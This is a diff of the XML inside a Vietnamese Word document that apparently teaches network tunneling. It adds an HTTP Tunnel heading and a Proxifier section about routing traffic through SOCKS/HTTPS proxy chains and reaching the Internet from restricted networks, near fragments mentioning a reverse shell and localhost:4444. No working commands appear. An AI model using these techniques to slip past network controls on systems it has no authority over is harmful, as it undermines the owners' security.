-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>tác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>với</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>máy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Một</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Reverse shell (hay </w:t>
+        <w:t xml:space="preserve">(hay </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -5103,6 +5078,13 @@
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">HTTP Tunnel </w:t>
       </w:r>
@@ -6286,7 +6268,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="2855595" cy="1104265"/>
@@ -6305,7 +6286,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId5">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6493,6 +6474,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Demo</w:t>
       </w:r>
     </w:p>
@@ -6697,8 +6679,3983 @@
       <w:r>
         <w:t xml:space="preserve"> localhost:4444</w:t>
       </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Proxi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>fier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Proxifier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chương</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trình</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cho</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>phép</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ứng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>không</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hỗ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trợ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>làm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>việc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> proxy </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hoạt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>động</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> qua proxy SOCKS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hoặc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> HTTPS </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hoặc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">chain </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>của</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> proxy</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Proxifier</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dễ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dàng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hầm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cho</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tất</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cả</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> TCP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>trên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hệ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thống</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hoặc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chỉ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>những</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>người</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chọn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Chạy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bất</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>kỳ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>ứng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>nào</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> proxy; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>không</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cần</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>phải</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cấu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hình</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>đặc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>biệt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cho</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>phần</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>mềm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>Truy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cập</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Internet </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>từ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>cục</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bộ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>bị</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>giới</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>hạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F4F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
